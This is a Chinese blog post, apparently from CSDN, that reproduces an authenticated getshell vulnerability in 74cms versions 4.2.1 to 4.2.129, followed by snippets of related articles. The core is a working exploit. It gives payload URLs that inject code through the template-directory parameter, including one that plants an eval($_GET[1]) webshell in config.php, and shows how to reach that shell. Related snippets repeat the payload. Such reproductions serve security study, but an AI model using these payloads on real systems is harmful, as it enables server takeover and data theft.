74cms v4.2.1-v4.2.129-后台getshell漏洞复现

最新推荐文章于 2022-09-25 18:43:59 发布
最新推荐文章于 2022-09-25 18:43:59 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_36374896/article/details/107004822
版权

0x00 影响范围

v4.2.1-v4.2.129

0x01 环境搭建

1. 先去官网下载 骑士人才系统基础版(安装包)

2.将下载好的包进行安装

 

0x02 复现过程

当前版本v4.2.111

 

点加工具,点击风格模板

 

Payload:
http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),'

shell地址:
http://127.0.0.1/74cms/Application/Home/Conf/config.php

直接访问

5.png

后端代码

GETSHELL

http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',eval($_GET[1]),'

 

后端代码

http://127.0.0.1/74cms/Application/Home/Conf/config.php?1=phpinfo();

0x03 漏洞分析

请移步http://www.xinziyou123.com/%e6%96%b0%e7%89%8874cms-v4-2-1-v4-2-129-%e5%90%8e%e5%8f%b0getshell%e6%bc%8f%e6%b4%9e/

 

浅笑⁹⁹⁶
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
04-08
74cms v4.2.1 v4.2.129 后台getshell漏洞.md
74cms人才系统3.4升级3.5企业版免密码,骑士人才cms3.4升级3.5
12-20
74cms人才系统3.4升级3.5企业版免密码,骑士人才cms3.4升级3.5,淘宝买的 ,自测可用
74cms v4.2.1-v4.2.129-后台getshell漏洞 复现
qq_43508668的博客
06-10 383
0x00 影响范围 v4.2.1-v4.2.129 0X01 环境搭建 74CMS官网 下载 v4.2.1-v4.2.129 0X02 漏洞复现 Payload: http://127.0.0.1/74cms/index.php?m=admin&c=tpl&a=set&tpl_dir=','a',phpinfo(),' shell地址: http://127.0.0.1/74cms/Application/Home/Conf/config.php 路径:\74cms\up
74CMS_v4.2.1-v4.2.129后台Getshell
Fly_鹏程万里
06-23 1056
影响范围 74CMS v4.2.1~v4.2.129 漏洞危害 后台Getshell 攻击类型 后台Getshell 利用条件 登陆后台 漏洞简介 74CMS管理后台在更换模板时由于模板的路径参数可控且对参数的安全性考虑不全导致该参数可控,最终攻击者可以利用该处的设计向配置文件写入一句话木马,并Getshell漏洞分析 漏洞触发位置为TplController.class.php文件中的set函数: 74cms_Home_Setup_v4.2.111\74c...
74cms搭建 2021.03.13
lyx3429的博客
03-15 992
1.复现环境搭建 win7虚拟机 小皮 74cms_v5.0.1 搭建成功 如果出现以下问题 数据库名字错了,或者数据库用户名密码啥的错了 cms的数据库和小皮是同一个 不是独立起来的 或者web填错了,服务器配置错了 ...
74cms v5.0.1 漏洞复现
p_lang的博客
04-30 3166
一、环境搭建 这里用到PHPstudy+VMware+Windows7(IP:192.168.253.131)进行环境搭建,且是在本地进行测试。 1.首先在官网下载74cms v5.0.1版本的安装包:http://www.74cms.com/download/index.html 2.将下载好的压缩包文件解压并放至PHPstudy的WWW目录下。 3.打开 192.168.253.131/74cms_Home_Setup_v5.0.1/upload/install.php 并系统安装。 OK,
74CMS 5.0.1后台getshell(CVE-2020-35339)分析
qq_41252520的博客
02-18 2825
0x0 漏洞简介 骑士人才系统是一项基于PHP+MYSQL为核心开发的一套免费 + 开源专业人才招聘系统。由太原迅易科技有限公司于2009年正式推出。为个人求职和企业招聘提供信息化解决方案, 骑士人才系统具备执行效率高、模板切换自由、后台管理功能灵活、模块功能强大等特点,自上线以来一直是职场人士、企业HR青睐的求职招聘平台。经过7年的发展,骑士人才系统已成国内人才系统行业的排头兵。系统应用涉及政府、企业、科研教育和媒体等行业领域,用户已覆盖国内所有省份和地区。 2016年全新推出骑士人才系统基础版,全新的
74cms前台getshell漏洞
qq_51922767的博客
12-09 987
74cms前台getshell漏洞
make-4.2.1-10.el8.x86_64.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
make-devel-4.2.1-11.el8.x86_64.rpm
01-20
官方离线安装包,测试可用。请使用rpm -ivh [rpm完整包名] 进行安装
make-devel-4.2.1-10.el8.x86_64.rpm
12-05
官方离线安装包,亲测可用
sed-4.2.1.rar包括sed-4.2.1-setup.exe、sed-4.2.1-dep.zip、sed-4.2.1-bin.zip
08-27
在给定的压缩包`sed-4.2.1.rar`中,包含了用于安装的`sed-4.2.1-setup.exe`,以及两个不同用途的ZIP文件:`sed-4.2.1-dep.zip`和`sed-4.2.1-bin.zip`。 **sed-4.2.1-setup.exe** `sed-4.2.1-setup.exe`是`sed`工具...
固件_S7-1212C_DCDCDC_6ES7212-1AE40-0XB0(V4.2.1-V4.5.2).rar
02-14
标题中的“固件_S7-1212C_DCDCDC_6ES7212-1AE40-0XB0(V4.2.1-V4.5.2).rar”揭示了这个压缩包是关于Siemens S7-1212C PLC(可编程逻辑控制器)的固件更新。S7-1212C是Siemens公司生产的一款紧凑型PLC,广泛应用于...
node-v4.2.1-linux-x86.tar.xz
最新发布
05-10
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 ...
node-v4.2.1-linux-x86.tar.gz
05-05
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 ...
php getshell漏洞,74cms前台某处Getshell漏洞(SSTI)
weixin_28406969的博客
03-17 488
这是一个服务端模板注入漏洞。Application/Home/Controller/MController.class.phpnamespace Home\Controller;use Common\Controller\FrontendController;class MController extends FrontendController{public function index(){i...
74cms v6.0.48模版注入+文件包含getshell复现
qq_41814777的博客
03-14 5595
漏洞描述 74cms由于函数过滤不严格导致攻击者可以通过构造执行任意代码 影响版本 骑士 CMS < 6.0.48 风险等级 高 漏洞环境搭建 74 cms: 74cms_Home_Setup_v6.0.20.zip 系统:ubuntu18.04.5 php环境:php 5.6 系统镜像:http://old-releases.ubuntu.com/releases/ web源码下载:https://www.74cms.com/download/index.html 准备好后直接把源码放到var/
骑士CMS01 74cms v4.2.111 后台getshell漏洞复现
m0_63253040的博客
09-25 3130
先进入网站后台/index.php?然后访问/Application/Home/Conf/config.php。猜测账号就是admin了,貌似这里登录会验证,试试能不能爆破密码。输入账号aaa回显管理员账号不存在,试试admin。进入后台找到工具=>风格模板=>可用模板,抓包。302跳转登录成功密码就是admin。拉到最下面查看网站cms版本。修改tpl_dir的值为。蚁剑连接找到flag。
D:\Program Files\maven\tools\repository\tk\mybatis\mapper\4.2.1\mapper-4.2.1.pom.part.lock (系统找不到指定的路径。)
11-10
如果在这个过程中出现了D:\Program Files\maven\tools\repository\tk\mybatis\mapper\4.2.1\mapper-4.2.1.pom.part.lock (系统找不到指定的路径。)的错误,可能是由于该路径下的文件被占用或者损坏导致的。可以尝试...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值